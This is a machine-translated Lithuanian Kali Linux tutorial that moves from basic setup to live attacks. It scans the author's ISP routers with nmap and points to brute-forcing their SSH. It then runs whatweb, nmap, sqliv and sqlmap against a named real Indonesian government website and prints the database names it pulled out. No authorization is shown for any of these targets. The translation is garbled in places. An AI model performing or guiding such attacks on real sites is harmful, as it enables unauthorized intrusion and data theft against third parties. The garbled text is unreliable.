„Kali Linux“ pamoka

Kali Linux Tutorial



Jei esate ekspertas ar bent jau susipažinote su „Linux“, komandomis ir aplinka, ką tik įdiegėte „Kali Linux“ savo kompiuteryje, norėjote tapti „Kali Linux“ meistru arba etiniu įsilaužėliu, tada esate tinkamoje vietoje. Šiame straipsnyje apžvelgsiu „Kali Linux“ pamoką, skirtą „Linux“ vartotojams, kurie dar nėra susipažinę su „Kali“, ir pradėsiu nuo kai kurių pagrindinių metodų, naudojamų įsilaužimui ir saugumo bandymams naudojant „Kali“.

Kas yra „Kali Linux“?

„Kali Linux“, ( pirmą kartą išleista 2013 m. kovo 13 d ), kuris oficialiai buvo žinomas kaip „BackTrack“, kurį sukūrė saugumo įmonė „Offensive Security“, yra teismo ir į saugumą orientuotas platinimas, pagrįstas „Debian“ testavimo filialu. „Kali Linux“ sukurta atsižvelgiant į skverbties testavimą, duomenų atkūrimą ir grėsmių aptikimą. Anksčiau šiais metais projektas buvo perkeltas į nuolatinio išleidimo modelį, siekiant platinimo vartotojams suteikti naujesnių saugos paslaugų. „Kali Linux“ yra nemokama ir visada bus. Jame yra daugiau nei 600 įsiskverbimo tikrinimo įrankių.







Kodėl „Kali Linux“? Ar tai tinka jums?

Neseniai „Kali Linux“ įgijo didelį populiarumą. Ir tam yra priežastis. Įsilaužimas vėl tapo įdomiausiu populiariosios kultūros dalyku, ir tai galima labai priskirti televizijos serialui „Ponas robotas“. M. Roboto populiarumas padėjo „Kali Linux“ įgyti naujų vartotojų. Žmonės, kurie beveik nežino apie „Linux“ ar ką nors, kas susiję su kompiuterių saugumu, dabar bando naudoti „Kali“ kaip pagrindinį „Linux“ platinimą.



Mūsų pažangiausias skverbimosi bandymų pasiskirstymas. - „Kali Linux“ kūrėjai. (Tai parašyta pagrindiniame Kali.org puslapyje pačiame puslapio viršuje.) Ką jūs gaunate iš to teiginio? Ar pastebite tai: APTD (Advanced Penetration Testing Distribution)? Čia nėra termino įsilaužimo tiesiogine prasme. „Kali Linux“ yra toks pat kaip ir kiti „Linux“ platinimai. Paprasčiau tariant, tai yra „Linux“ platinimas, kuriame yra su sauga susijusių įrankių ir skirtas tinklo ir kompiuterių saugumo ekspertams. Tačiau naudojant „Kali Linux“ pagrindinis dėmesys skiriamas tik saugumui ir teismo ekspertizei.



„Linux“ platinimas yra ne kas kita, kaip paketas, kuriame yra „Linux“ branduolys, pagrindinių paslaugų ir programų rinkinys ir kai kurie numatytieji nustatymai. Taigi, „Kali Linux“ nesiūlo kažko unikalaus šia prasme, dauguma pateiktų įrankių gali būti įdiegti bet kuriame „Linux“ platinime.





„Kali Linux“ yra specialiai pritaikytas atitikti profesionalių skverbties testų ir saugumo audito reikalavimus. Jis skirtas tam tikram „Linux“ vartotojų pogrupiui. Pentesteriai, įsilaužėliai ir tt Tai nėra rekomenduojamas platinimas, jei tikitės, kad „Kali“ bus skirtas bendrosios paskirties „Linux“ darbalaukiui kurti, interneto dizainui, žaidimams, biurui ir pan. „Kali“ gali sukelti tam tikrų iššūkių, net jei esate patyręs „Linux“ vartotojas .

DARBAI ĮDIEGUS KALI LINUX

Įdiegę „Kali Linux“, jums gali kilti klausimas, ką daryti toliau, ar ne? Visi susiduria su šia problema, nesijaudinkite.



1 ŽINGSNIS: SURINKITE SAUGONĘ

Pirma, jūs tai jau žinote, tačiau labai svarbu teisingai nustatyti saugyklą. Kaip jau sakiau, „Kali Linux“ nuolatinio išleidimo modelis stengiasi platintojo vartotojams suteikti naujesnių saugos paslaugų. Paprastai, jei ką tik įdiegėte „Kali Linux“, saugykla nurodo laikmeną, kurią naudojate diegti. Norėdami tai išspręsti, turite pakeisti saugyklą į oficialią „Kali Linux“ saugyklą. Reikalingas failas yra po /etc/apt/sources.list . Atidarykite failą naudodami lapų teksto redaktorių ir pakeiskite numatytąją saugyklą į šią oficialią „Kali Rolling“ saugyklą:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

2 ŽINGSNIS: ATNAUJINKITE IR ATNAUJINKITE „KALI LINUX“

Po to atnaujinę ir atnaujinę sistemą, sinchronizuokite „Kali Linux“ su naujausia versija. Norėdami tai padaryti, atidarykite terminalą ir įveskite:

apt update -y && apt upgrade -y && apt dist-upgrade 

Tinkama atnaujinimo komanda atsisiunčia ir paima paketo sąrašą iš saugyklų ir atnaujina jas, kad gautų informaciją apie naujausias paketų versijas ir jų priklausomybes.

Tinkama atnaujinimo komanda atsisiunčia ir įdiegia naujesnę įdiegtų „Kali Linux“ paketų paketų versiją, jei joje nėra klaidų dėl priklausomybių.

„Apt dist-upgrade“ atnaujins visus paketus į naujausią turimą versiją, nesvarbu. Taip pat prireikus įdiekite ir pašalinkite priklausomybes (žinoma, įdiekite priklausomybes, kad patenkintumėte paketus, bet taip pat pašalinkite priklausomybes, kurios tapo našlaičiais, jei atnaujintam paketui priklausomybės nebereikia.

PAGRINDINIS PENETRACIJOS BANDYMO SĄVOKA SU KALI LINUX

Sėkmingai atlikę šiuos veiksmus, yra trys pagrindiniai dalykai, kuriuos galėtumėte padaryti naudodami „Kali Linux“, remdamiesi tiksline sistema, įskaitant:

  1. Belaidžio tinklo įsilaužimas - „Wifi“ įsilaužimas, sukčiavimas, apsinuodijimas ARP ir kt.
  2. Žiniatinklio programų įsilaužimas -SQL įpurškimas, kelių svetainių užklausų klastojimas (CSRF), internetinė phising ir kt.
  3. Įsilaužimas į įrenginį - Išnaudokite tikslinę mašiną, kad ją valdytumėte.

Aš neįtraukiu įsilaužimo į internetą, tai nereiškia, kad „Kali Linux“ neturi galimybių šiam tikslui. Bet pažodžiui tai taip pat gali priklausyti „Device Hacking“. Kadangi prietaisas turi fizinę išvaizdą ir formą. Šioje pamokoje apžvelgiau pagrindines jų žinias. Kadangi „Kali Linux“ yra didžiulė, ji netelpa į vieną straipsnį!

Taip pat turite žinoti skverbimosi bandymo ciklą ar procedūrą. Jie yra:

  1. Žvalgyba - informacijos rinkimas
  2. Nuskaitymas
  3. Operacija
  4. Po išnaudojimo

BEVIELIO TINKLO NUVYKIMAS SU KALI LINUX

Kalbant apie įsilaužimą į belaidį tinklą, auka gali skirtis. Kadangi belaidžius tinklus sudaro keli dalykai, tokie kaip IPT (interneto paslaugų teikėjas), maršrutizatorius ir jo draugai (modemas, šakotuvas, jungiklis ir tt) ir klientai (vartotojai, vaizdo stebėjimo sistema, nuotolinis kompiuteris ir kt.). Jie taip pat turi pažeidžiamų galimybių.

Internetas yra didelis ir sudėtingas tinklo įrangos junginys, sujungtas šliuzais. Paketų sekimo maršruto stebėjimas yra svarbus norint žinoti, kaip pasiekiate tam tikrą pagrindinio kompiuterio pavadinimą arba tikslinį IP adresą.

„Kali Linux“ turi įmontuotą įrankį „Traceroute“. „Traceroute“ naudoja IP protokolą, skirtą aktyviam laukui, ir bando išgauti ICMP TIME_EXCEEDED atsakymą iš kiekvieno šliuzo kelyje į pagrindinį kompiuterį. „Traceroute“ bando atsekti maršrutą, kuriuo IP paketas eitų kažkuriam interneto prieglobos serveriui, paleidžiant zondų paketus su mažu TTL (laikas gyventi), tada klausantis ICMP laiko, viršijančio šliuzo atsakymą. Pateiksiu jums pavyzdį, kaip atsekti IPT maršrutizatorių, naudojamą mūsų ryšiui tvarkyti naudojant „Traceroute“.

1. Pripažinimas

Informacijos rinkimas yra svarbiausia pradžia, nepraleiskite šio žingsnio. Šiame etape mūsų tikslas yra įgyti kuo daugiau naudingos informacijos, kurią galėtume gauti, ir tada ši informacija naudojama tolesniems veiksmams.

Pirmiausia atidarykite terminalą ir įveskite šią komandą, kad pradėtumėte sekti kelią į svetainę, šiuo atveju aš nustatiau svetainę į google.com.

traceroute google.com 

„Traceroute“ ekrano kopija

2. Nuskaitymas

Kai paleisime komandas, jame bus išvardyta, kur mūsų paketas eina iš eilės. Kaip matote aukščiau, aš turiu 3 apynius, vienas iš jų yra mano IPT serveris. Pirmasis sąraše esantis IP yra mano maršrutizatorius, kuris veikia kaip vartai. Kiti du iš jų priklauso mano IPT. Dabar patikrinkime paslaugą, kurią jie naudoja naudodami „Nmap“. Taigi, tikslai, kuriuos ketiname nuskaityti, yra 10.152.192.1 ir 10.13.223.102 . Terminale paleidau šią komandą:

nmap -v -sS [IP Target] -Pn 

Išskaidykime komandos argumentą:

-v = Įgalinti daugiakalbiškumo režimą

-sS = Naudokite TCP SYN nuskaitymo techniką

-Pn = Visus šeimininkus traktuokite kaip prisijungusius -praleiskite šeimininko atradimą

Ir štai rezultatas, kurį gavome.

nmap ekrano kopija 2

Deja, visi uostai veikia 10.152.192.1 yra filtruojami, tai reiškia, kad visi įeinantys TCP ryšiai yra užblokuoti IDS arba ugniasienės šiuo IP. Dabar dar kartą nuskaitykime antrąjį taikinį.

nmap ekrano kopija 1

3. Operacija

Šios procedūros metu aš nesu tikrasis išnaudojimas, aš parodysiu, kaip tai padaryti. Remdamiesi aukščiau pateiktu „Nmap“ nuskaitymo rezultatu, žinome, kad šis IP turi SSH serverį, veikiantį 22 prievade, ir yra atidarytas. Tai atvira brutaliai, haha! Radome skylę, šis SSH serveris yra galima skylė, į kurią galėtume pabandyti patekti. „Kali Linux“ yra keletas įrankių, palaikančių „bruteforce“ ar žodyno atakas prieš SSH protokolą. Populiariausias ir galingiausias yra „Hydra“.

Gerai, tai buvo pagrindinė procedūra, leidžianti įsiskverbti prieš tikslinį serverį, kuris mūsų pavyzdyje yra mano IPT serveris.

ŽINIOTEKINĖS PROGRAMOS SU KALI LINUX

Tiesą sakant, jei esate aistringas, galite nustatyti įsilaužimo aplinką įdiegdami DWVA (Damn Vulnerable Web App) į savo „Kali Linux“. Tai PHP/MySQL žiniatinklio programa, turinti daugybę pažeidžiamų skylių. Jos pagrindiniai tikslai yra padėti saugumo specialistams išbandyti savo įgūdžius ir įrankius teisinėje aplinkoje ir padėti žiniatinklio kūrėjams geriau suprasti žiniatinklio programų apsaugos procesus. DWVA nemokamai galite gauti „Github“ čia: https://github.com/ethicalhack3r/DVWA.

Kol kas aš jums parodysiu, kaip padaryti internetinių programų įsilaužimą tikroje svetainėje. Tačiau pažadėkite, kad tai apsiriboja tik švietimo tikslais. Mes imituosime tikrą ataką tikroje svetainėje, naudodami SQL injekciją.

Būtina sąlyga

Įtraukti įrankiai:

-„Whatweb“ (iš anksto įdiegta)

-Nmap (iš anksto įdiegta)

- SQLiv (įdiegti rankiniu būdu)

-SQLMap (iš anksto įdiegta)

Mums reikia dar vieno papildomo įrankio, kurį galima rasti „Github“ čia: https://github.com/Hadesy2k/sqliv, pirmiausia įdiekite jį į „Kali Linux“. Šis įrankis pavadintas SQLiv, kuris gali atlikti tikslinį nuskaitymą, pateikdamas konkretų domeną (su tikrinimu). Įveskite terminalą:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Tikslas: www.trenggalekkab.go.id

1. Pripažinimas

Surinkite kuo daugiau naudingos informacijos. Galėtume atidaryti tinklalapį ir aptikti, kokia programa veikia šioje svetainėje. Pirmiausia patikrinkime, kokia tai svetainė. Tam naudosime „weweb“.

whatweb www.trenggalekkab.go.id 

Kokia žiniatinklio ekrano kopija

Kaip matote aukščiau pateiktą rezultatą, taikinys yra Indonezijoje. Jis veikia Apache v2.2.27 savo žiniatinklio serveryje ir taip pat turi PHP v5.4.31 , jis turi IP adresą 103.247.21.142 . Gerai, įsidėmėkite tai. Jums gali tekti apsilankyti jo tinklalapyje, ieškant sukurto failo ar puslapio, URL parametrų ar net prisijungimo formos. Kol kas mums reikia to IP adreso kitam nuskaitymo žingsniui.

2. Nuskaitymas

Kaip ir anksčiau, mes vėl naudojame „Nmap“, kad nuskaitytume, kokie uostai ir paslaugos veikia taikinyje.

nmap -v -sS 103.247.21.142 

Ir štai rezultatas, kurį gavome:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Yra daugybė atvirų prievadų, kurie tvarko kiekvieną paskirties paslaugą, tačiau akį traukianti yra ta „mysql“ paslauga 3306. prievade. Nurodyta, kad ši svetainė naudoja mysql valdyti savo informaciją duomenų bazėse. Tada man įdomu, ar šioje svetainėje yra kokių nors SQL injekcijų pažeidžiamumų. Taigi, aš dar kartą nuskenuoju svetainę naudodamas ką tik įdiegtą SQLiv. Įvedžiau komandą:

sqliv -t www.trenggalekkab.go.id 

„SQLHacking ScreenShot“ 1

Šioje svetainėje radome 2 galimus SQL pažeidžiamus URL. Įsidėmėkite tuos URL.

3. Operacija

Gerai, mes turime SQL pažeidžiamus URL ir esame pasirengę vykdyti. Norėdami tai padaryti, mes naudosime SQLMap. Sintaksė yra tokia:

sqlmap [Vulnerable URL] --dbs 

Komanda turėtų atrodyti taip:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

-Dbs argumentas yra nurodyti SQLMap gauti tikslines duomenų bazes. Štai rezultatas, kurį gavome:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

„SQLMap“ rado 2 duomenų bazes, tačiau tik vieną iš jų, kurioje yra neskelbtinų duomenų, pvz., Administratoriaus kredencialų paskyrą. Tai yra trengkab_trg. Suradę duomenų bazes, turime dar vieną žingsnį. Tai yra surasti lenteles ir stulpelius, o paskutinis žingsnis - išmesti duomenis. Aš nerodysiu, kaip čia, šiame skyriuje, naudojant šį tikslą. Bent jau žinote pagrindinę atakos ciklo idėją ir kai kuriuos įrankius.

ĮRENGINIO NUVYRA

Būsimame šios svetainės straipsnyje aptarsime įrenginių įsilaužimą, sekite naujienas. Kaip išankstinį įspėjimą norėsite įsitikinti, kad žinote tam tikrą „Python“.